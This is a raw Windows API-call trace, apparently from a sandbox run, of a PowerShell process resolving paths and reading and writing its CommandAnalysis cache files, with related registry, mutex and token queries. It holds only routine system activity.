	[0050.271] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.271] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18b380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b7c0) returned 1
	[0050.271] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18b8a0 | out: lpFileInformation=0x184c18b8a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b780) returned 1
	[0050.272] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18", nBufferLength=0x105, lpBuffer=0x184c18b220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18", lpFilePart=0x0) returned 0x8f
	[0050.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b700) returned 1
	[0050.272] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_0ac90668-b7fb-46d6-80e6-01a947284e18"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6bc
	[0050.272] GetFileType (hFile=0x6bc) returned 0x1
	[0050.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b670) returned 1
	[0050.272] GetFileType (hFile=0x6bc) returned 0x1
	[0050.272] SetEndOfFile (hFile=0x6bc) returned 1
	[0050.543] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c189ca8 | out: phkResult=0x184c189ca8*=0x0) returned 0x2
	[0050.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c189ca8 | out: phkResult=0x184c189ca8*=0x0) returned 0x2
	[0050.566] WriteFile (in: hFile=0x6bc, lpBuffer=0x1504797c9a8*, nNumberOfBytesToWrite=0x4a3, lpNumberOfBytesWritten=0x184c18b818, lpOverlapped=0x0 | out: lpBuffer=0x1504797c9a8*, lpNumberOfBytesWritten=0x184c18b818*=0x4a3, lpOverlapped=0x0) returned 1
	[0050.567] CloseHandle (hObject=0x6bc) returned 1
	[0050.571] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf940
	[0050.571] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbf940 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.571] CoTaskMemFree (pv=0x1505fbbf940) 
	[0050.571] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.571] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18b320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b760) returned 1
	[0050.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18b840 | out: lpFileInformation=0x184c18b840*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b720) returned 1
	[0050.572] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18b1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0050.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b6a0) returned 1
	[0050.572] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6bc
	[0050.572] GetFileType (hFile=0x6bc) returned 0x1
	[0050.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b610) returned 1
	[0050.572] GetFileType (hFile=0x6bc) returned 0x1
	[0050.572] SetEndOfFile (hFile=0x6bc) returned 1
	[0050.573] WriteFile (in: hFile=0x6bc, lpBuffer=0x1504797f128*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18b078, lpOverlapped=0x0 | out: lpBuffer=0x1504797f128*, lpNumberOfBytesWritten=0x184c18b078*=0x1000, lpOverlapped=0x0) returned 1
	[0050.574] WriteFile (in: hFile=0x6bc, lpBuffer=0x1504797f128*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18aeb8, lpOverlapped=0x0 | out: lpBuffer=0x1504797f128*, lpNumberOfBytesWritten=0x184c18aeb8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.575] WriteFile (in: hFile=0x6bc, lpBuffer=0x1504797f128*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18b078, lpOverlapped=0x0 | out: lpBuffer=0x1504797f128*, lpNumberOfBytesWritten=0x184c18b078*=0x1000, lpOverlapped=0x0) returned 1
	[0050.575] WriteFile (in: hFile=0x6bc, lpBuffer=0x1504797f128*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18aeb8, lpOverlapped=0x0 | out: lpBuffer=0x1504797f128*, lpNumberOfBytesWritten=0x184c18aeb8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.576] WriteFile (in: hFile=0x6bc, lpBuffer=0x1504797f128*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x184c18b7b8, lpOverlapped=0x0 | out: lpBuffer=0x1504797f128*, lpNumberOfBytesWritten=0x184c18b7b8*=0xdda, lpOverlapped=0x0) returned 1
	[0050.576] CloseHandle (hObject=0x6bc) returned 1
	[0050.578] ReleaseMutex (hMutex=0x6cc) returned 1
	[0050.581] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbfb60
	[0050.581] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbfb60 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.581] CoTaskMemFree (pv=0x1505fbbfb60) 
	[0050.581] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.581] CoTaskMemAlloc (cb=0x218) returned 0x1505fbbdda0
	[0050.581] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbbdda0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0050.581] CoTaskMemFree (pv=0x1505fbbdda0) 
	[0050.581] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf940
	[0050.581] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbf940 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.581] CoTaskMemFree (pv=0x1505fbbf940) 
	[0050.581] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.588] GetCurrentProcess () returned 0xffffffffffffffff
	[0050.588] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d288 | out: TokenHandle=0x184c18d288*=0x6bc) returned 1
	[0050.588] GetTokenInformation (in: TokenHandle=0x6bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d388 | out: TokenInformation=0x0, ReturnLength=0x184c18d388) returned 0
	[0050.588] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505f48dc00
	[0050.588] GetTokenInformation (in: TokenHandle=0x6bc, TokenInformationClass=0x1, TokenInformation=0x1505f48dc00, TokenInformationLength=0x2c, ReturnLength=0x184c18d388 | out: TokenInformation=0x1505f48dc00, ReturnLength=0x184c18d388) returned 1
	[0050.588] LocalFree (hMem=0x1505f48dc00) returned 0x0
	[0050.589] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x150479851e0, cbSid=0x184c18d380 | out: pSid=0x150479851e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d380) returned 1
	[0050.589] CreateMutexW (lpMutexAttributes=0x15047985330, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x6d0
	[0050.589] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d220*=0x6d0, lpdwindex=0x184c18cff4 | out: lpdwindex=0x184c18cff4) returned 0x0
	[0050.589] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0050.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d280 | out: lpFileInformation=0x184c18d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d160) returned 1
	[0050.589] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0050.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d0e0) returned 1
	[0050.590] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d4
	[0050.590] GetFileType (hFile=0x6d4) returned 0x1
	[0050.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0050.590] GetFileType (hFile=0x6d4) returned 0x1
	[0050.590] ReadFile (in: hFile=0x6d4, lpBuffer=0x150479863b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cf48, lpOverlapped=0x0 | out: lpBuffer=0x150479863b8*, lpNumberOfBytesRead=0x184c18cf48*=0x1000, lpOverlapped=0x0) returned 1
	[0050.592] ReadFile (in: hFile=0x6d4, lpBuffer=0x1504798812c, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18cb78, lpOverlapped=0x0 | out: lpBuffer=0x1504798812c*, lpNumberOfBytesRead=0x184c18cb78*=0x2b, lpOverlapped=0x0) returned 1
	[0050.592] ReadFile (in: hFile=0x6d4, lpBuffer=0x150479863b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cc18, lpOverlapped=0x0 | out: lpBuffer=0x150479863b8*, lpNumberOfBytesRead=0x184c18cc18*=0x1000, lpOverlapped=0x0) returned 1
	[0050.593] ReadFile (in: hFile=0x6d4, lpBuffer=0x15047988164, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18c9c8, lpOverlapped=0x0 | out: lpBuffer=0x15047988164*, lpNumberOfBytesRead=0x184c18c9c8*=0x9, lpOverlapped=0x0) returned 1
	[0050.593] ReadFile (in: hFile=0x6d4, lpBuffer=0x150479863b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18ca68, lpOverlapped=0x0 | out: lpBuffer=0x150479863b8*, lpNumberOfBytesRead=0x184c18ca68*=0x1000, lpOverlapped=0x0) returned 1
	[0050.594] ReadFile (in: hFile=0x6d4, lpBuffer=0x1504798819c, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18cbb8, lpOverlapped=0x0 | out: lpBuffer=0x1504798819c*, lpNumberOfBytesRead=0x184c18cbb8*=0xb, lpOverlapped=0x0) returned 1
	[0050.594] ReadFile (in: hFile=0x6d4, lpBuffer=0x150479863b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cbb8, lpOverlapped=0x0 | out: lpBuffer=0x150479863b8*, lpNumberOfBytesRead=0x184c18cbb8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.594] ReadFile (in: hFile=0x6d4, lpBuffer=0x150479863b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cac8, lpOverlapped=0x0 | out: lpBuffer=0x150479863b8*, lpNumberOfBytesRead=0x184c18cac8*=0xd9b, lpOverlapped=0x0) returned 1
	[0050.594] ReadFile (in: hFile=0x6d4, lpBuffer=0x150479863b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cf18, lpOverlapped=0x0 | out: lpBuffer=0x150479863b8*, lpNumberOfBytesRead=0x184c18cf18*=0x0, lpOverlapped=0x0) returned 1
	[0050.594] CloseHandle (hObject=0x6d4) returned 1
	[0050.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0050.595] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047993540 | out: lpFileInformation=0x15047993540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0050.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0050.595] ReleaseMutex (hMutex=0x6d0) returned 1
	[0050.595] GetCurrentProcess () returned 0xffffffffffffffff
	[0050.595] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d3b8 | out: TokenHandle=0x184c18d3b8*=0x6d4) returned 1
	[0050.595] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d4b8 | out: TokenInformation=0x0, ReturnLength=0x184c18d4b8) returned 0
	[0050.595] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505f48ddc0
	[0050.595] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x1, TokenInformation=0x1505f48ddc0, TokenInformationLength=0x2c, ReturnLength=0x184c18d4b8 | out: TokenInformation=0x1505f48ddc0, ReturnLength=0x184c18d4b8) returned 1
	[0050.595] LocalFree (hMem=0x1505f48ddc0) returned 0x0
	[0050.595] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x150479941c8, cbSid=0x184c18d4b0 | out: pSid=0x150479941c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d4b0) returned 1
	[0050.595] CreateMutexW (lpMutexAttributes=0x15047994318, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x6d8
	[0050.596] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d350*=0x6d8, lpdwindex=0x184c18d124 | out: lpdwindex=0x184c18d124) returned 0x0
	[0050.643] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc14e0
	[0050.643] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbc14e0, nSize=0x10a | out: lpBuffer="") returned 0x0
	[0050.644] CoTaskMemFree (pv=0x1505fbc14e0) 
	[0050.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3e0) returned 1
	[0050.644] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047411a90 | out: lpFileInformation=0x15047411a90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0050.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3a0) returned 1
	[0050.644] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d260) returned 1
	[0050.644] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d340 | out: lpFileInformation=0x184c18d340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0050.644] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0050.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0050.644] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c8
	[0050.645] GetFileType (hFile=0x6c8) returned 0x1
	[0050.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d110) returned 1
	[0050.645] GetFileType (hFile=0x6c8) returned 0x1
	[0050.645] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047413088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d008, lpOverlapped=0x0 | out: lpBuffer=0x15047413088*, lpNumberOfBytesRead=0x184c18d008*=0x1000, lpOverlapped=0x0) returned 1
	[0050.647] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047414dfc, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18cc38, lpOverlapped=0x0 | out: lpBuffer=0x15047414dfc*, lpNumberOfBytesRead=0x184c18cc38*=0x2b, lpOverlapped=0x0) returned 1
	[0050.647] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047413088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18ccd8, lpOverlapped=0x0 | out: lpBuffer=0x15047413088*, lpNumberOfBytesRead=0x184c18ccd8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.648] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047414e34, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18ca88, lpOverlapped=0x0 | out: lpBuffer=0x15047414e34*, lpNumberOfBytesRead=0x184c18ca88*=0x9, lpOverlapped=0x0) returned 1
	[0050.648] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047413088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cb28, lpOverlapped=0x0 | out: lpBuffer=0x15047413088*, lpNumberOfBytesRead=0x184c18cb28*=0x1000, lpOverlapped=0x0) returned 1
	[0050.648] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047414e6c, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18cc78, lpOverlapped=0x0 | out: lpBuffer=0x15047414e6c*, lpNumberOfBytesRead=0x184c18cc78*=0xb, lpOverlapped=0x0) returned 1
	[0050.648] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047413088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cc78, lpOverlapped=0x0 | out: lpBuffer=0x15047413088*, lpNumberOfBytesRead=0x184c18cc78*=0x1000, lpOverlapped=0x0) returned 1
	[0050.648] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047413088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cb88, lpOverlapped=0x0 | out: lpBuffer=0x15047413088*, lpNumberOfBytesRead=0x184c18cb88*=0xd9b, lpOverlapped=0x0) returned 1
	[0050.649] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047413088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cfd8, lpOverlapped=0x0 | out: lpBuffer=0x15047413088*, lpNumberOfBytesRead=0x184c18cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0050.649] CloseHandle (hObject=0x6c8) returned 1
	[0050.649] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbc14e0
	[0050.649] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbc14e0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.649] CoTaskMemFree (pv=0x1505fbc14e0) 
	[0050.650] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
